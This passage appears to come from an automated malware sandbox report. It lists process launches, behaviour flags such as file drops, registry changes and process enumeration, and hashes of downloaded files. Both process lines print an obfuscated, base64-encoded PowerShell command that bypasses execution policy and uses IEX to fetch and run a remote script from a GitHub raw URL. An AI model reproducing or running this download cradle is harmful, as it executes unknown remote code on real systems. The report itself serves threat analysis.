C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1960
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2268
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
0e770c7e25b5ff40895bd0abd52d18ed
SHA1ad4356ac5f8c166a3a63c4398946dadb89648be6
SHA25612397f7f126a761a25e2a230e0cb2a02ed5de4d4f1dc48f3ee7e38d09e239613
SHA512f00d7d03ea85cef46f73a803d65b354c864c8f69e53ffa6e996c758bde8874173a8b5e42cf0802f14bc4fcaf92f7ab7e08c09845518f7b5bf8294f3f5ca3a357
-
MD5
0a5d80710c027d178c58bfd063b7358f
SHA1b7dcc77ed46dceb46740d4604591dfdccfac15da
SHA256eba64151eac6bf3d24fb9118f3688688fd62a041ed36b580dab6c0cf456a6d74
SHA5121b27a7d2e0506ce8477c61ee642c55ea9ec92368d01270e3fb451d83662214bf2dc99d9bbb8143a02b298d68f5e6175a137f25f23d3a6c3a702c0b374cce09c5
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
6938a2a0fa3adc1ab9cc3bb479ff0e74
SHA137e2117cf83cdf1a631a394ce6f0c57f70ee3f47
SHA256df16833eb7975ca070466bf2f655e078508a59968d8f50f14a8ff7873008d068
SHA5125509bae8342bfc482a671258fe3012247f89b2449e84f6c42a4dd0bc73cd4177fff6d581c3615214fc0b5f115a77e24213c5dd37f8c0631eb9064349c33eec79
-
MD5
fb53697f840e14272413f6c0fc3d9b40
SHA17f68d814989d99abf0b1bc0866c71f4176a2b971
SHA2564940a2ff346c667006a52f1ca5107e874bd213458041f5b27b8abf3dee41c70e
SHA51205ae5d9e37e0ba2f18245292304938e83ad36f78ecedc031673b52f3fdf7689dacf55965a4ca722b62486c1cc6b95cb96b60e0e8cfb945b8794557e9275b3f1d
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
a165727b81025658f7479a3fb4b3114e
SHA1d1a8fc81c40fd1eebbdbeef18b3a72b5df59c58d
SHA2568a1bb80788626d68925fecfb8511fea3ee5f036c750273d0ac926d1d5fbd57ad
SHA512eb7d26d552131aa2dac78451373a7ebebd40669c9895e70af5211f7a1e676d1ba2bd5749407a0a9e9f0bcd86fd2fbaa40ba8880e6688c999cca4a2c872fe5a8b
-
MD5
70d1bf1c7a95f0613358ac07bc3864ad
SHA152783a6ace472471ad68b602c604e48340737596
SHA25688e639c34e7798f2e51a121db7e0dedc7c5f4bfa95963bb5c93bcb221e0127c3
SHA512ed5e46ee00e735ca09c5cf4dfed311a4229ff08e9d626c1afa2ed6cc7543f8808259f9553666844ebf25d775b20af0a9bafe59c3b525a6918db1e8c7f70e4fb5
-
MD5
58b4c6a70f55d70a401015da300261b2
SHA1a13b8a1a577c3638c311f5e668b61cea8a532d35
SHA2569eaa1a087f7aaa768134c540941584fdc2cd8d050b375a36ded9d1cdf7fb7fe0
SHA5120ae4aaf9f6383b752b824f86e9ae10983e9f00df9868efa3a1c5e1f2bfae062e43458260c7a379b7d6f711f4ef6a6f22035cc4cd21d7ba1b3c7a5e10f8f06289